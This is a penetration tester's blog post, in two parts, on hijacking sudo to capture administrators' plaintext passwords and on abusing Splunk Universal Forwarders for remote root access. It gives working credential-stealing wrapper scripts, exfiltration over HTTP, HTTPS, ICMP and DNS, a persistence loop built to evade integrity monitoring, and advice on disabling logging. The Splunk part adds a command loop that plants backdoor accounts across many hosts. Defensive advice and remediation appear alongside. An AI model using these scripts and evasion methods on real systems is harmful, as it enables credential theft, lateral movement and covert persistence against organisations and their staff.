Eapolsniper's Blog
01000010 01100101 00100000 01000101 01111000 01100011 01100101 01101100 01101100 01100101 01101110 01110100 00100000 01010100 01101111 00100000 01000101 01100001 01100011 01101000 00100000 01001111 01110100 01101000 01100101 01110010 00000000 00000000 00000000 00000000

Sudo Hijacking

History

Back in the early 2000s, when us poor hackers didn't have GPUs to crack with, we had to get creative to acquire plain text passwords. A common technique, at least in my group of friends, was Sudo Hijacking. Sudo Hijacking is where you move the sudo binary and replace it with a script which mimics sudo, capturing the user's plain text password for the attacker while relaying the password to the legitimate sudo binary so the user still gets access.
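
Something like the following sketch is the general idea (this is not my InitialPoC script, and as you'll see below modern sudo broke the naive version; the attacker address is a placeholder):

#!/bin/bash
# Classic sudo wrapper sketch. Assumes the real binary was already moved
# to /usr/bin/zsudo and that the attacker is collecting over plain HTTP.
ATTACKER="192.0.2.10"   # placeholder collector address

# Mimic sudo's password prompt
read -r -s -p "[sudo] password for $USER: " PASS
echo

# The credentials show up in the attacker's web server access log.
# A real script would URL-encode special characters.
curl -s "http://${ATTACKER}/?u=${USER}&p=${PASS}" >/dev/null 2>&1

# Relay the password to the real sudo so the user sees normal behavior
echo "$PASS" | /usr/bin/zsudo -S -p '' "$@"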

Present Day

I was having a discussion last week with someone and mentioned Sudo Hijacking and that you can intercept the password and provide a user access to 'sudo su -' without the user noticing the change. The person I was speaking with denied this was possible, and a Nerd Off began. I had my old code, last used around 2009, and gave it a try but found sudo had received updates which broke the old tried and true methods. It appears there's some level of basic command filtering to prevent exploitation of sudo in this manner. I decided to see if I could get a working Proof of Concept again and ended up succeeding. I'm fairly certain I could do it better, but all I'm attempting to show is the concept, the risk, and how to use and prevent these types of attacks. I did some googling and asking around and it appears this technique is not common anymore in the pentest/red team world, and as such I felt it was worth writing about.

Hashed Passwords - Problems And Solutions

One thing you will note is that to do this you must have root access in order to move the sudo binary. Having root access is likely to make many people think this is not a vulnerability, since root already gives you full control of the entire system, but nobody runs a single computer anymore, so we're going to look beyond the single host and see this vulnerability as it relates to a computer network. In fact, I notified the creator of Sudo, and they stated they do not feel this is a vulnerability and provided a number of sound reasons; I agree, so long as we're only thinking of a single system.

As an attacker you will often find a vulnerability to compromise a host as root, and that's awesome, but how do you move from that single host to other hosts? Grabbing /etc/shadow is the most likely method, but with the usage of SHA-512 type 6 ($6$) hashes in combination with password managers storing long random passwords, cracking passwords has gotten a lot more difficult. Most users either use the same password across most Linux systems for ease of access, or they use centralized authentication such as OpenLDAP or Active Directory. This means if we can get the plain text password on the host we've compromised, we can use that password to pivot to other systems, and since many administrators in less security conscious companies use their Domain Administrator account as their everyday admin account, this could lead to Domain compromise. Sudo Hijacking becomes one of a number of techniques which can be used to capture the administrator's password and gain lateral movement.

Video

[The original post embeds a video demo of the attack here.]

Execution Steps

Download the InitialPoC script from my repository

  1. cp /usr/bin/sudo /usr/bin/zsudo
  2. rm /usr/bin/sudo
  3. cp newsudo /usr/bin/sudo
  4. chmod 4755 /usr/bin/sudo
  5. chmod 4755 /usr/bin/zsudo
  6. Start 'python -m SimpleHTTPServer 80' on the attacker machine
  7. Wait for a user to run 'sudo su -' (note: this is the command I chose to test with, but the script could easily be modified for any sudo command; a consolidated setup sketch follows this list)
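
Rolled into a single sketch (run as root on the target; newsudo stands in for the downloaded InitialPoC wrapper):

#!/bin/bash
# Stage the hijack: keep the real binary as zsudo, drop the wrapper in its place
cp /usr/bin/sudo /usr/bin/zsudo
rm /usr/bin/sudo
cp ./newsudo /usr/bin/sudo
chmod 4755 /usr/bin/sudo /usr/bin/zsudo

# On the attacker machine, start the collector (Python 2, as in the steps above):
#   python -m SimpleHTTPServer 80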

Defense

We’re going to skip to Defense and then back to Offense. Bear with me, I have a reason.

The primary method of defense for this is to use a File Integrity Monitoring (FIM) solution, which will identify any changes to files on a system. Important controls for FIM are: detected file changes must be logged off-system, FIM should notify upon start/stop, and FIM should occasionally send an ignored beacon back so the FIM server can tell if the agent has died or been tampered with. This control doesn't even cost money! OSSEC is a free and reliable tool for this. If you want something that is more of a finished product with better reporting, I've worked with Tripwire before and it did an excellent job. Now for the hard part: you can't just log file changes, you have to actually notice that they occurred. You should have a change management system, and your FIM should automatically create a ticket and assign it to the system administrator of the system, so they can review any file changes. If an administrator sees a change to a system file and they haven't run updates or anything similar, they should notify the incident response team.
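
To show what FIM boils down to under the hood, here is a bare-bones sketch (nowhere near a replacement for OSSEC or Tripwire; the log host is a placeholder):

#!/bin/bash
# Minimal integrity check: baseline a few critical binaries, then report any
# drift to a remote syslog host so the evidence lives off the compromised system.
BASELINE=/var/lib/fim-baseline.sha256
LOGHOST="loghost.example.com"    # placeholder central log host

if [ ! -f "$BASELINE" ]; then
    sha256sum /usr/bin/sudo /usr/bin/su /bin/bash > "$BASELINE"
    exit 0
fi

# Run from cron; only mismatches are printed and shipped off-host
sha256sum --quiet -c "$BASELINE" 2>&1 | logger -n "$LOGHOST" -P 514 -t fim-check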

In addition to this, I recommend installing an antivirus/anti-rootkit system on the host. On many engagements I exploit Linux hosts more than Windows hosts, and I have run into 2-3 customers total that used FIM on Linux, and none that use antivirus. This makes moving around and trying different privilege escalation methods very safe for the attacker.

I'm a fan of using an antivirus system which includes FIM functions for system-wide FIM, and then installing OSSEC to monitor the antivirus files to ensure nobody tampers with the primary AV/FIM. Disabling antivirus is trivial in most cases and often goes unnoticed. This will be another blog post in the near future.

As you would with any malware, monitor for suspicious outbound network connections, especially from servers. Linux systems are a lot quieter than Windows systems; very few agents query for updates or do any sort of outbound calls. Monitoring normal network connections over a few weeks to a month, marking all URLs/IPs as known, and treating anything new after that as suspicious is a fast way to detect compromised systems. Update your known hosts list if any new IPs show up and you determine they are legitimate.
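
A rough sketch of that baseline-then-alert idea (field positions in ss output can vary between versions, the allowlist path is a placeholder, and adding new entries to the allowlist stays a manual decision):

#!/bin/bash
# Compare current TCP peers against a previously built allowlist and log anything new
KNOWN=/var/lib/known-destinations.txt
touch "$KNOWN"

# Peer address:port is field 4 when filtering on state; strip the port and dedupe.
# Note this lists peers of all established connections, inbound and outbound.
ss -nt state established | awk 'NR>1 {print $4}' | sed 's/:[0-9]*$//' | sort -u |
while read -r peer; do
    grep -qxF "$peer" "$KNOWN" || logger -t netbaseline "new destination: $peer"
done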

Hiding Installation

So, let's assume you compromise a host and haven't left any tracks yet. You want to do Sudo Hijacking but they have File Integrity Monitoring enabled. How do you get around this? Your best bet is to write a script and execute it, monitoring bash history files to see if/when updates are applied to the system. If updates are applied, then have the script automatically reconfigure the Sudo environment. When updates apply, administrators often just see hundreds of file changes and mark all of them as legitimate, since they know they installed updates that evening. Ideally you won't save the setup script to disk; instead write the script as a bash one-liner and run it on the command line in the background. If for some reason you must run your script from disk, place it in /tmp under an innocent name like page.tmp, and once it has executed and is running in memory, delete the local file.
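
A sketch of such a watcher, simplified to check the binary itself rather than bash history (the staged wrapper path in /dev/shm is a placeholder):

# Background one-liner: if an update replaces our wrapper with a real sudo
# binary, quietly re-apply the hijack. The wrapper script contains the string
# "zsudo"; a real ELF binary does not.
nohup bash -c 'while true; do
  if ! grep -q "zsudo" /usr/bin/sudo 2>/dev/null; then
    cp /usr/bin/sudo /usr/bin/zsudo          # keep the freshly updated binary
    cp /dev/shm/.cache /usr/bin/sudo         # placeholder path to the staged wrapper
    chmod 4755 /usr/bin/sudo /usr/bin/zsudo
  fi
  sleep 300
done' >/dev/null 2>&1 &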

Speeding Up Success

Before I say anything about this, remember to get permission from your company contact to stop services, as this will likely cause a service outage. On some systems this may be acceptable and on others it may not be.

Administrators are busy and may not log in on the schedule which you would prefer. The longer you're on systems, the more likely you'll be detected. As such, in certain circumstances it may be advantageous to speed up the admin logging in. If the server is running a web service, you could try stopping the service. An administrator is likely to log in to try to figure out why the service has died, and to restart it they will need administrative access. The same can be done for any running service aside from SSH, which they will need in order to log in. Don't do anything else on the host aside from copying off /etc/shadow in case this all fails. You don't want artifacts lying around to make the administrator suspicious. They will already be suspicious of why a process that usually runs without issue suddenly died.

Hiding Exfiltration

Let's talk about the largest problem with my Proof of Concept. The script is sending a plain text username and password over unencrypted HTTP. Internally there's a good chance this won't get caught by most organizations, but if you're doing this attack over the internet, not only is it likely to be caught by defensive systems, but it would expose your customer's password to every device between them and your attack host. This is not good. As such I recommend setting up an Apache server with HTTPS to act as your collector. Make sure to use a legitimate certificate; Let's Encrypt is free!

So, now that we're not causing a breach, let's look at how to get the Blue Team to leave us alone. Your script is not going to generate very many outbound connections, which is excellent, so you just need to make the traffic look halfway innocent and it should slide by. I recommend you make a POST request to your attacker server and make it look like an established session checking for an update: encrypt the username:password with a pre-shared key you know using openssl, and place the encrypted blob in a session header so it looks like a valid session cookie for a website. Alternatively you can make it look like a Basic authentication connection, but that can easily be decoded, and you run the risk of the Blue Team asking the administrator what they tried logging into on the internet from a Linux server with their internal credentials. I know I'd be asking if I were them.
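
A sketch of that fake-session check-in (the collector URL and pre-shared key are placeholders, $PASS is assumed to hold the captured password, and openssl's -pbkdf2 flag needs OpenSSL 1.1.1 or newer):

#!/bin/bash
COLLECTOR="https://updates.example.com/check"   # placeholder HTTPS collector
PSK="correct horse battery staple"              # pre-shared key known to you

# Encrypt username:password with the PSK and base64 it so it looks like a token
BLOB=$(echo -n "${USER}:${PASS}" | \
       openssl enc -aes-256-cbc -pbkdf2 -salt -pass "pass:${PSK}" -a -A)

# POST it with the blob riding in a cookie-style header, mimicking a session check-in
curl -s -X POST "$COLLECTOR" \
     -H "Cookie: session=${BLOB}" \
     -H "User-Agent: Mozilla/5.0" \
     -d "status=ok" >/dev/null 2>&1

# Server side, the blob decrypts with the same key:
#   openssl enc -d -aes-256-cbc -pbkdf2 -pass "pass:${PSK}" -a -A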

There are some alternate exfiltration methods out there that take a little more setup. The upside of being a bad guy is that finding anyone doing egress filtering is practically unheard of, still, in 2020. Any Blue Teams reading this, please make our jobs harder.

  1. You can exfiltrate out using ICMP, where ICMP packets can be padded with legitimate-looking data and reassembled on the other side (a sketch of this and the DNS option follows this list). Again, you're only sending a small amount of data, so this is likely to go unnoticed. If you encrypt the data first it's going to look so garbled that it should pass as random garbage, though reassembly could be a problem if you lose a packet, so you may want to send the same thing 2-3 times to ensure delivery.
  2. DNS exfiltration. This is a common way of exfiltrating everything nowadays, since DNS is one of the most common protocols allowed outbound on locked down networks.
  3. Batching usernames/passwords and sending them daily. If this happens to be a super busy host for sudo, maybe a developer test environment, then batching and sending may be smarter than sending each set immediately upon login. I'd use this with care, since I personally would rather have a password and risk getting caught than have no password and still risk getting caught.
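
Sketches of the first two options, assuming 192.0.2.10 and exfil.example.com are attacker-controlled placeholders and $PASS holds the captured password:

# Hex-encode the credentials so they survive both channels
DATA=$(echo -n "${USER}:${PASS}" | xxd -p | tr -d '\n')

# 1. ICMP: Linux ping can pad packets with up to 16 bytes of pattern data
#    (32 hex characters), so the payload is chunked and reassembled from a capture.
for chunk in $(echo "$DATA" | fold -w 32); do
    ping -c 1 -p "$chunk" 192.0.2.10 >/dev/null 2>&1
done

# 2. DNS: encode the data into subdomain labels (max 63 characters each) of a
#    domain whose authoritative server you control, then simply resolve them.
for chunk in $(echo "$DATA" | fold -w 60); do
    dig +short "${chunk}.exfil.example.com" >/dev/null 2>&1
done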

Alternate Attack Method

After I wrote my PoC I did some googling and found a number of people doing a similar attack by modifying a user's .bashrc file to switch sudo for just that user. This is an interesting Sudo Hijacking method, though I'd personally prefer to switch the executable for two reasons: 1) it will only work for individual users, unless you also poison the bashrc skeleton file, which has a higher chance of being noticed, and 2) people actually look at their .bashrc files more often than you'd think, so it is likely to be noticed over time. This could work for a very short engagement, but I feel it has a higher chance of being caught long term. On the upside, while .bashrc files come set with rw-r--r-- permissions, users have a habit of screwing up permissions on their own files and leaving them that way, so there's a chance of finding files that are writable and could allow you to escalate privilege instead of just capturing plain text passwords. This also could come in very handy with NFS shares which expose users' home directories. I'll cover exploiting this with NFS in a future article.

https://null-byte.wonderhowto.com/how-to/steal-ubuntu-macos-sudo-passwords-without-any-cracking-0194190/
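
For reference, the .bashrc variant boils down to something like this sketch (the linked post's actual script differs; here the captured password is just dropped in /tmp):

# Appended to the target user's ~/.bashrc: shadow the real sudo with a function
sudo() {
    # Always prompting is a simplification; real sudo caches credentials,
    # so an unexpected prompt can look suspicious.
    read -r -s -p "[sudo] password for $USER: " __pw; echo
    echo "$USER:$__pw" >> /tmp/.page.tmp        # or exfiltrate as shown earlier
    echo "$__pw" | command sudo -S -p '' "$@"   # hand off to the real binary
    unset __pw
}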

Abusing Splunk Forwarders For Shells and Persistence

Description:

The Splunk Universal Forwarder Agent (UF) allows authenticated remote users to send single commands or scripts to the agents through the Splunk API. The UF agent doesn't validate that connections are coming from a valid Splunk Enterprise server, nor does the UF agent validate that the code is signed or otherwise proven to be from the Splunk Enterprise server. This allows an attacker who gains access to the UF agent password to run arbitrary code on the server as SYSTEM or root, depending on the operating system.

This attack is being used by Penetration Testers and is likely being actively exploited in the wild by malicious attackers. Gaining the password could lead to the compromise of hundreds of systems in a customer environment.

Splunk UF passwords are relatively easy to acquire; see the section Common Password Locations for details.

Context:

Splunk is a data aggregation and search tool often used as a Security Information and Event Management (SIEM) system. Splunk Enterprise Server is a web application which runs on a server, with agents, called Universal Forwarders, which are installed on every system in the network. Splunk provides agent binaries for Windows, Linux, Mac, and Unix. Many organizations use Syslog to send data to Splunk instead of installing an agent on Linux/Unix hosts, but agent installation is becoming increasingly popular.

The Universal Forwarder is accessible on each host at https://host:8089. Accessing any of the protected API calls, such as /services/, pops up a Basic authentication box. The username is always admin, and the default password used to be changeme until 2016, when Splunk began requiring any new installation to set a password of 8 characters or longer. As you will note in my demo, complexity is not a requirement, as my agent password is 12345678. A remote attacker can brute force the password without lockout, which is a necessity on a log host: if the account locked out, logs would no longer be sent to the Splunk server, and an attacker could use that to hide their attacks. The following screenshot shows the Universal Forwarder agent; this initial page is accessible without authentication and can be used to enumerate hosts running Splunk Universal Forwarder.

[Screenshot: Universal Forwarder landing page at https://host:8089, reachable without authentication.]
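
A quick sketch of sweeping for that unauthenticated page with curl (the subnet is the lab range used later in this post, and the grep string is an assumption about what the page contains):

#!/bin/bash
# Sweep a /24 for the Splunk management port and flag likely Universal Forwarders
for i in $(seq 1 254); do
    host="192.168.42.$i"
    if curl -sk --connect-timeout 2 "https://${host}:8089/" | grep -qi splunk; then
        echo "Splunk management port found: $host"
    fi
done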

Splunk documentation shows using the same Universal Forwarder password for all agents. I don't remember for sure whether this is a requirement or whether individual passwords can be set for each agent, but based on the documentation and my memory from when I was a Splunk admin, I believe all agents must use the same password. This means if the password is found or cracked on one system, it is likely to work on all Splunk UF hosts. This has been my personal experience, allowing compromise of hundreds of hosts quickly.

Common Password Locations

I often find the Splunk Universal Forwarding agent plain text password in the following locations on networks:

  1. Active Directory Sysvol/domain.com/Scripts directory. Administrators store the executable and the password together for efficient agent installation.
  2. Network file shares hosting IT installation files
  3. Wiki or other build note repositories on internal network

The password can also be accessed in hashed form in Program Files\Splunk\etc\passwd on Windows hosts, and in /opt/Splunk/etc/passwd on Linux and Unix hosts. An attacker can attempt to crack the password using Hashcat, or rent a cloud cracking environment to increase the likelihood of cracking the hash. The password is a strong SHA-256 hash, and as such a strong, random password is unlikely to be cracked.

Impact:

An attacker with a Splunk Universal Forwarder Agent password can fully compromise all Splunk hosts in the network and gain SYSTEM or root level permissions on each host. I have successfully used the Splunk agent on Windows, Linux, and Solaris Unix hosts. This vulnerability could allow system credentials to be dumped, sensitive data to be exfiltrated, or ransomware to be installed. This vulnerability is fast, easy to use, and reliable.

Since Splunk handles logs, an attacker could reconfigure the Universal Forwarder with the first command run, changing the forwarding destination and disabling logging to the Splunk SIEM. This would drastically reduce the chances of being caught by the client Blue Team.
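
As a sketch, delivered through the same remote code execution, that reconfiguration could be as simple as the following (the install path and CLI behavior can vary by version, and 9997 is assumed to be the receiving port):

# Cut off log forwarding before doing anything noisy (run on the victim UF host)
SPLUNK=/opt/splunkforwarder/bin/splunk

# See where this agent currently sends its logs...
"$SPLUNK" list forward-server -auth admin:12345678

# ...then remove that destination so later activity never reaches the SIEM
"$SPLUNK" remove forward-server 192.168.42.114:9997 -auth admin:12345678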

Splunk Universal Forwarder is often seen installed on Domain Controllers for log collection, which could easily allow an attacker to extract the NTDS file, disable antivirus for further exploitation, and/or modify the domain.

Finally, the Universal Forwarder Agent does not require a license and can be configured with a password standalone. As such, an attacker can install the Universal Forwarder as a backdoor persistence mechanism on hosts, since it is a legitimate application which customers, even those who do not use Splunk, are not likely to remove.

Evidence:

To show an exploitation example I set up a test environment using the latest Splunk version for both the Enterprise Server and the Universal Forwarding agent. A total of 10 images have been attached to this report, showing the following:

  1. Requesting the /etc/passwd file through PySplunkWhisperer2 (Image 1)
  2. Receiving the /etc/passwd file on the attacker system through Netcat (Image 2)
  3. Requesting the /etc/shadow file through PySplunkWhisperer2 (Image 3)
  4. Receiving the /etc/shadow file on the attacker system through Netcat (Image 4)
  5. Adding the user attacker007 to the /etc/passwd file (Image 5)
  6. Adding the user attacker007 to the /etc/shadow file (Image 6)
  7. Receiving the new /etc/shadow file showing attacker007 is successfully added (Image 7)
  8. Confirming SSH access to the victim using the attacker007 account (Image 8)
  9. Adding a backdoor root account with username root007, with the uid/gid set to 0 (Image 9)
  10. Confirming SSH access using attacker007, and then escalating to root using root007 (Image 10)

At this point I have persistent access to the host both through Splunk and through the two user accounts created, one of which provides root. I can disable remote logging to cover my tracks and continue attacking the system and network using this host.

Scripting PySplunkWhisperer2 is very easy and effective.

  1. Create a file with the IPs of hosts you want to exploit, for example ip.txt
  2. Run the following (broken over lines for readability; the payload appends a backdoor user to /etc/passwd on every host in the list):

for i in $(cat ip.txt); do
    python PySplunkWhisperer2_remote.py --host $i --port 8089 \
        --username admin --password "12345678" \
        --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" \
        --lhost 192.168.42.51
done

Host information:

Splunk Enterprise Server: 192.168.42.114
Splunk Forwarder Agent Victim: 192.168.42.98
Attacker: 192.168.42.51

Splunk Enterprise version: 8.0.5 (latest as of August 12, 2020 – day of lab setup)
Universal Forwarder version: 8.0.5 (latest as of August 12, 2020 – day of lab setup)

Remediation Recommendations for Splunk, Inc:

I recommend implementing all of the following solutions to provide defense in depth:

  1. Ideally, the Universal Forwarder agent would not have a port open at all, but rather would poll the Splunk server at regular intervals for instructions.
  2. Enable TLS mutual authentication between the clients and server, using individual keys for each client. This would provide very strong bi-directional security between all Splunk services. TLS mutual authentication is being heavily implemented in agents and IoT devices; this is the future of trusted client-to-server device communication.
  3. Send all code, whether single commands or script files, in a compressed file which is encrypted and signed by the Splunk server. This does not protect the agent data sent through the API, but it protects against malicious remote code execution from a 3rd party.

Remediation Recommendations for Splunk customers:

  1. Ensure a very strong password is set for Splunk agents. I recommend at least a 15-character random password, but since these passwords are never typed, this could be set to a very long password such as 50 characters.
  2. Configure host based firewalls to only allow connections to port 8089/TCP (the Universal Forwarder Agent's port) from the Splunk server (see the sketch below).
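
A sketch of recommendation 2 with plain iptables, using the lab's Splunk server IP as a stand-in for your own:

#!/bin/bash
SPLUNK_SERVER=192.168.42.114   # your Splunk Enterprise server

# Allow only the Splunk server to reach the UF management port, drop everyone else
# (order matters: the ACCEPT rule must come before the DROP)
iptables -A INPUT -p tcp --dport 8089 -s "$SPLUNK_SERVER" -j ACCEPT
iptables -A INPUT -p tcp --dport 8089 -j DROP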

Recommendations for Red Team:

  1. Download a copy of Splunk Universal Forwarder for each operating system, as it is a great lightweight signed implant. Good to keep a copy in case Splunk actually fixes this.

Exploits/Blogs from other researchers

Usable public exploits:

  • https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
  • https://www.exploit-db.com/exploits/46238
  • https://www.exploit-db.com/exploits/46487

Related blog posts:

  • https://clement.notin.org/blog/2019/02/25/Splunk-Universal-Forwarder-Hijacking-2-SplunkWhisperer2/
  • https://medium.com/@airman604/splunk-universal-forwarder-hijacking-5899c3e0e6b2
  • https://www.hurricanelabs.com/splunk-tutorials/using-splunk-as-an-offensive-security-tool

**Note:** This is a serious issue with Splunk systems, and it has been exploited by other testers for years. While Remote Code Execution is an intended feature of Splunk Universal Forwarder, the implementation of it is dangerous. I attempted to submit this bug via Splunk's bug bounty program in the very unlikely chance they are not aware of the design implications, but was notified that any bug submissions fall under the Bugcrowd/Splunk disclosure policy, which states no details of the vulnerability may ever be discussed publicly without Splunk's permission. I requested a 90 day disclosure timeline and was denied. As such, I did not responsibly disclose this: I am reasonably sure Splunk is aware of the issue and has chosen to ignore it, I feel this could severely impact companies, and it is the responsibility of the infosec community to educate businesses.